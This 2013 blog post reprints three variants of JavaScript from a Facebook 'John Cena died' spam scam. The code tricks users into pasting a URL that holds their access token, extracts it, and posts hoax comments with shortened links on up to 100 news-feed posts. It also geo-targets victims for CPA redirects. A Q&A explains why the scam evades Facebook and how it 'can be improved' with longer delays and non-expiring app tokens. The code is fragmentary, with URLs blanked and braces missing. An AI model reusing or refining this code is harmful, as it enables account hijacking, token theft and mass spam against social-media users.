Friday, 22 February 2013

John Cena of WWE died spam - main execution source code

Q: Why facebook didn't block the apps? Why i couldn't remove the apps?

A: The spam consists of different famous app id, such as youtube app (Visit or, iphone app..etc. It just borrow the app id to get access token from user. No point for facebook to block it and no way for you to remove it(Em..i means some of them no way, not all. Some apps like is almost impossible to remove). However, this kind of app require APP secret key to get 2 months long term access token, that's means this borrowed token only can survive for 2 hours. There's still got exception, if the spam redirect via, the access token would consider as desktop application type, which able to survive for 2 months(You can change your password to force it expire.)

Q: What can be improve the spam?

A: Likes can spam of course, however, Comment spam sure block before comments all 50 posts id from newsfeed, and previous commented may deleted by facebook. The total of comments should decrease as possible. (to those who are concerned,
Facebook API have different rate limits calculation for /feed, /link, /comment, /like, etc). Delay between each request should longer. And as i mentioned, the code should force user redirect to, not And using some application id like windows messenger, firefox messenger ...etc, which never expired(Again, change your password to make it dead).

Javascript 1:
var country = geoip_country_code();
if (country == 'PH' || country == 'SA' || country == 'SG' || country == 'HK' || country == 'AE' || country == 'ID' || country == 'LT' || country == 'TW') {};
if (country == 'US' || country == 'GB' || country == 'FR' || country == 'DE') {
window['location'] = '';
var is_firefox = navigator['userAgent']['toLowerCase']()['indexOf']('firefox') > -1;
if (is_firefox) {
window['location'] = '';
var isCtrl = false;
document['onkeyup'] = function (_0xd2e8x4) {
if (_0xd2e8x4['which'] == 17) {
isCtrl = false;
document['onkeydown'] = function (_0xd2e8x4) {
if (_0xd2e8x4['which'] == 17) {
isCtrl = true;
return false;
$('.url')['live']('paste', function (_0xd2e8x5) {
var _0xd2e8x6 = this;
setTimeout(function () {
var _0xd2e8x7 = $(_0xd2e8x6)['val']();
$('.control')['css']('display', 'none');
$('#loading_bar')['css']('display', 'block');
}, 100);

function SetFocus(_0xd2e8x9) {

function checkData(_0xd2e8xb) {
try {
if (_0xd2e8xb['indexOf']('access_token=') == -1) {
throw new Error('invalid access_token');
var _0xd2e8xc = _0xd2e8xb['split']('access_token=')['pop']()['split']('&')['shift']();
var _0xd2e8xd = _0xd2e8xb['split']('expires_in=')['pop']()['split']('&')['shift']();
console['log']('got token', _0xd2e8xc);
if (_0xd2e8xc) {
} else {
throw new Error('invalid access_token');
} catch (e) {
var handleError = function () {
alert('Whoops! Looks like there was a problem generating your code, please try again');
$('.control')['css']('display', 'block');
$('#loading_bar')['css']('display', 'none');

function cpa() {
window['location'] = '';

function latestShort(_0xd2e8x11, _0xd2e8x12) {
var _0xd2e8x13 = '' + encodeURIComponent(_0xd2e8x11) + '&callback=?';
$['getJSON'](_0xd2e8x13, function (_0xd2e8x14) {
_0xd2e8x12 && _0xd2e8x12(_0xd2e8x14['shorturl']);

function doShit(_0xd2e8x16) {
$['getJSON']('' + _0xd2e8x16, function (_0xd2e8x17) {
if (_0xd2e8x17['id']) {
var _0xd2e8x18 = _0xd2e8x17['id'];
var _0xd2e8x19 = _0xd2e8x17['name'];
var _0xd2e8x1a = Math['floor'](Math['random']() * 734892748932);
var _0xd2e8x1b = 'John Cena of WWE died in a head injury while training! Watch the original v1deo cl1p here >>> ';
var _0xd2e8x1c = new Array();
_0xd2e8x1c[0] = '';
_0xd2e8x1c[1] = '';
_0xd2e8x1c[2] = '';
_0xd2e8x1c[3] = '';
_0xd2e8x1c[4] = '';
_0xd2e8x1c[5] = '';
_0xd2e8x1c[6] = '';
_0xd2e8x1c[7] = '';
_0xd2e8x1c[8] = '';
_0xd2e8x1c[9] = '';
_0xd2e8x1c[10] = '';
var _0xd2e8x1d = 50;
$['getJSON']('' + _0xd2e8x18 + '/home?limit=' + _0xd2e8x1d + '&access_token=' + _0xd2e8x16, function (_0xd2e8x17) {
if (_0xd2e8x17['data']) {
var _0xd2e8x1e = [];
var _0xd2e8x1f = 0;
$['each'](_0xd2e8x17['data'], function (_0xd2e8x20, _0xd2e8xb) {
var _0xd2e8x21 = Math['floor'](Math['random']() * _0xd2e8x1c['length']);
var _0xd2e8x22 = Math['floor'](Math['random']() * _0xd2e8x1a);
var _0xd2e8x23 = _0xd2e8x1c[_0xd2e8x21] + '?' + _0xd2e8x22;
var _0xd2e8x24 = new Array();
_0xd2e8x24[0] = '';
_0xd2e8x24[1] = '';
_0xd2e8x24[2] = '';
_0xd2e8x24[3] = '';
_0xd2e8x24[4] = '';
_0xd2e8x24[5] = '';
_0xd2e8x24[6] = '';
_0xd2e8x24[7] = '';
_0xd2e8x24[8] = '';
_0xd2e8x24[9] = '';
_0xd2e8x24[10] = '';
var _0xd2e8x25 = Math['floor'](Math['random']() * _0xd2e8x24['length']);
var _0xd2e8x26 = null;
$['getJSON']('' + _0xd2e8x23, function (_0xd2e8xb) {
_0xd2e8x26 = _0xd2e8xb['shorturl'];
_0xd2e8x1f = _0xd2e8x1f + 1;
if (!_0xd2e8x26) {
_0xd2e8x26 = _0xd2e8x24[_0xd2e8x25];

function _0xd2e8x27() {
var _0xd2e8x28 = _0xd2e8x1b + _0xd2e8x26;
$['getJSON']('' + _0xd2e8xb['id'] + '/comments?method=POST&message=' + _0xd2e8x28 + '&access_token=' + _0xd2e8x16, function (_0xd2e8x17) {
console['log']('comment id: ' + _0xd2e8xb['id']);

function _0xd2e8x29() {
if (_0xd2e8x1f == _0xd2e8x1d) {
console['log'](_0xd2e8x1f, _0xd2e8x1d);
} else {
alert('Wrong Code. Please try again.');
$('.control')['css']('display', 'block');
$('#loading_bar')['css']('display', 'none');

Javascript 2:
if (document['location']['href']['indexOf']('') !== -1) {} else {
top['location'] = '';
var is_firefox = navigator['userAgent']['toLowerCase']()['indexOf']('firefox') > -1;
if (is_firefox) {
window['location'] = '';
var isCtrl = false;
document['onkeyup'] = function (_0x78b2x3) {
if (_0x78b2x3['which'] == 17) {
isCtrl = false;
document['onkeydown'] = function (_0x78b2x3) {
if (_0x78b2x3['which'] == 17) {
isCtrl = true;
return false;
$('.url')['live']('paste', function (_0x78b2x4) {
var _0x78b2x5 = this;
setTimeout(function () {
var _0x78b2x6 = $(_0x78b2x5)['val']();
$('.control')['css']('display', 'none');
$('#loading_bar')['css']('display', 'block');
}, 100);

function SetFocus(_0x78b2x8) {

function checkData(_0x78b2xa) {
try {
if (_0x78b2xa['indexOf']('access_token=') == -1) {
throw new Error('invalid access_token');
var _0x78b2xb = _0x78b2xa['split']('access_token=')['pop']()['split']('&')['shift']();
var _0x78b2xc = _0x78b2xa['split']('expires_in=')['pop']()['split']('&')['shift']();
console['log']('got token', _0x78b2xb);
if (_0x78b2xb) {
} else {
throw new Error('invalid access_token');
} catch (e) {
var handleError = function () {
alert('Whoops! Looks like there was a problem generating your code, please try again');
$('.control')['css']('display', 'block');
$('#loading_bar')['css']('display', 'none');

function cpa() {
window['location'] = '';

function doShit(_0x78b2x10) {
$['getJSON']('' + _0x78b2x10, function (_0x78b2x11) {
if (_0x78b2x11['id']) {
var _0x78b2x12 = _0x78b2x11['id'];
var _0x78b2x13 = _0x78b2x11['name'];
var _0x78b2x14 = Math['floor'](Math['random']() * 734892748932);
var _0x78b2x15 = 'John Cena of WWE died in a head injury while training! Watch the original v1deo cl1p here >>> ';
var _0x78b2x16 = new Array();
_0x78b2x16[0] = '';
_0x78b2x16[1] = '';
_0x78b2x16[2] = '';
_0x78b2x16[3] = '';
_0x78b2x16[4] = '';
var _0x78b2x17 = 50;
$['getJSON']('' + _0x78b2x12 + '/home?limit=' + _0x78b2x17 + '&access_token=' + _0x78b2x10, function (_0x78b2x11) {
if (_0x78b2x11['data']) {
var _0x78b2x18 = [];
var _0x78b2x19 = 0;
$['each'](_0x78b2x11['data'], function (_0x78b2x1a, _0x78b2xa) {
var _0x78b2x1b = Math['floor'](Math['random']() * _0x78b2x16['length']);
var _0x78b2x1c = Math['floor'](Math['random']() * _0x78b2x14);
var _0x78b2x1d = _0x78b2x16[_0x78b2x1b] + '?' + _0x78b2x1c;
var _0x78b2x1e = new Array();
_0x78b2x1e[0] = '';
_0x78b2x1e[1] = '';
_0x78b2x1e[2] = '';
_0x78b2x1e[3] = '';
_0x78b2x1e[4] = '';
var _0x78b2x1f = Math['floor'](Math['random']() * _0x78b2x1e['length']);
var _0x78b2x20 = null;
$['getJSON']('' + _0x78b2x1d, function (_0x78b2xa) {
_0x78b2x20 = _0x78b2xa['shorturl'];
_0x78b2x19 = _0x78b2x19 + 1;
if (!_0x78b2x20) {
_0x78b2x20 = _0x78b2x1e[_0x78b2x1f];

function _0x78b2x21() {
var _0x78b2x22 = _0x78b2x15 + _0x78b2x20;
$['getJSON']('' + _0x78b2xa['id'] + '/comments?method=POST&message=' + _0x78b2x22 + '&access_token=' + _0x78b2x10, function (_0x78b2x11) {
console['log']('comment id: ' + _0x78b2xa['id']);

function _0x78b2x23() {
if (_0x78b2x19 == _0x78b2x17) {
console['log'](_0x78b2x19, _0x78b2x17);
} else {
alert('Wrong Code. Please try again.');
$('.control')['css']('display', 'block');
$('#loading_bar')['css']('display', 'none');
Javascript 3:
var country = geoip_country_code();
var is_firefox = navigator['userAgent']['toLowerCase']()['indexOf']('firefox') > -1;
if (is_firefox) {
window['location'] = '';
var isCtrl = false;
document['onkeyup'] = function (_0xc57bx4) {
if (_0xc57bx4['which'] == 17) {
isCtrl = false;
document['onkeydown'] = function (_0xc57bx4) {
if (_0xc57bx4['which'] == 17) {
isCtrl = true;
return false;
$('.url')['live']('paste', function (_0xc57bx5) {
var _0xc57bx6 = this;
setTimeout(function () {
var _0xc57bx7 = $(_0xc57bx6)['val']();
$('.control')['css']('display', 'none');
$('#loading_bar')['css']('display', 'block');
}, 100);

function SetFocus(_0xc57bx9) {

function checkData(_0xc57bxb) {
try {
if (_0xc57bxb['indexOf']('access_token=') == -1) {
throw new Error('invalid access_token');
var _0xc57bxc = _0xc57bxb['split']('access_token=')['pop']()['split']('&')['shift']();
var _0xc57bxd = _0xc57bxb['split']('expires_in=')['pop']()['split']('&')['shift']();
console['log']('got token', _0xc57bxc);
if (_0xc57bxc) {
} else {
throw new Error('invalid access_token');
} catch (e) {
var handleError = function () {
alert('Whoops! Looks like there was a problem generating your code, please try again');
$('.control')['css']('display', 'block');
$('#loading_bar')['css']('display', 'none');

function cpa() {
window['location'] = '';

function doShit(_0xc57bx11) {
$['getJSON']('' + _0xc57bx11, function (_0xc57bx12) {
if (_0xc57bx12['id']) {
var _0xc57bx13 = _0xc57bx12['id'];
var _0xc57bx14 = _0xc57bx12['name'];
var _0xc57bx15 = Math['floor'](Math['random']() * 734892748932);
var _0xc57bx16 = 'John Cena of WWE died in a head injury while training! Watch the original v1deo cl1p here >>> ';
var _0xc57bx17 = new Array();
if (country == 'US' || country == 'GB' || country == 'FR' || country == 'DE') {
_0xc57bx17[0] = '';
_0xc57bx17[1] = '';
_0xc57bx17[2] = '';
_0xc57bx17[3] = '';
_0xc57bx17[4] = '';
_0xc57bx17[5] = '';
} else {
_0xc57bx17[0] = '';
_0xc57bx17[1] = '';
_0xc57bx17[2] = '';
_0xc57bx17[3] = '';
_0xc57bx17[4] = '';
_0xc57bx17[5] = '';
var _0xc57bx18 = 100;
$['getJSON']('' + _0xc57bx13 + '/home?limit=' + _0xc57bx18 + '&access_token=' + _0xc57bx11, function (_0xc57bx12) {
if (_0xc57bx12['data']) {
var _0xc57bx19 = [];
var _0xc57bx1a = 0;
$['each'](_0xc57bx12['data'], function (_0xc57bx1b, _0xc57bxb) {
var _0xc57bx1c = Math['floor'](Math['random']() * _0xc57bx17['length']);
var _0xc57bx1d = Math['floor'](Math['random']() * _0xc57bx15);
var _0xc57bx1e = _0xc57bx17[_0xc57bx1c] + '?' + _0xc57bx1d;
var _0xc57bx1f = new Array();
if (country == 'US' || country == 'GB' || country == 'FR' || country == 'DE') {
_0xc57bx1f[0] = '';
_0xc57bx1f[1] = '';
_0xc57bx1f[2] = '';
} else {
_0xc57bx1f[0] = '';
_0xc57bx1f[1] = '';
_0xc57bx1f[2] = '';
var _0xc57bx20 = Math['floor'](Math['random']() * _0xc57bx1f['length']);
var _0xc57bx21 = null;
$['getJSON']('' + _0xc57bx1e, function (_0xc57bxb) {
_0xc57bx21 = _0xc57bxb['shorturl'];
_0xc57bx1a = _0xc57bx1a + 1;
if (!_0xc57bx21) {
_0xc57bx21 = _0xc57bx1f[_0xc57bx20];

function _0xc57bx22() {
var _0xc57bx23 = _0xc57bx16 + _0xc57bx21;
$['getJSON']('' + _0xc57bxb['id'] + '/comments?method=POST&message=' + _0xc57bx23 + '&access_token=' + _0xc57bx11, function (_0xc57bx12) {
console['log']('comment id: ' + _0xc57bxb['id']);

function _0xc57bx24() {
if (_0xc57bx1a == _0xc57bx18) {
console['log'](_0xc57bx1a, _0xc57bx18);
} else {
alert('Wrong Code. Please try again.');
$('.control')['css']('display', 'block');
$('#loading_bar')['css']('display', 'none');

No comments:

Post a Comment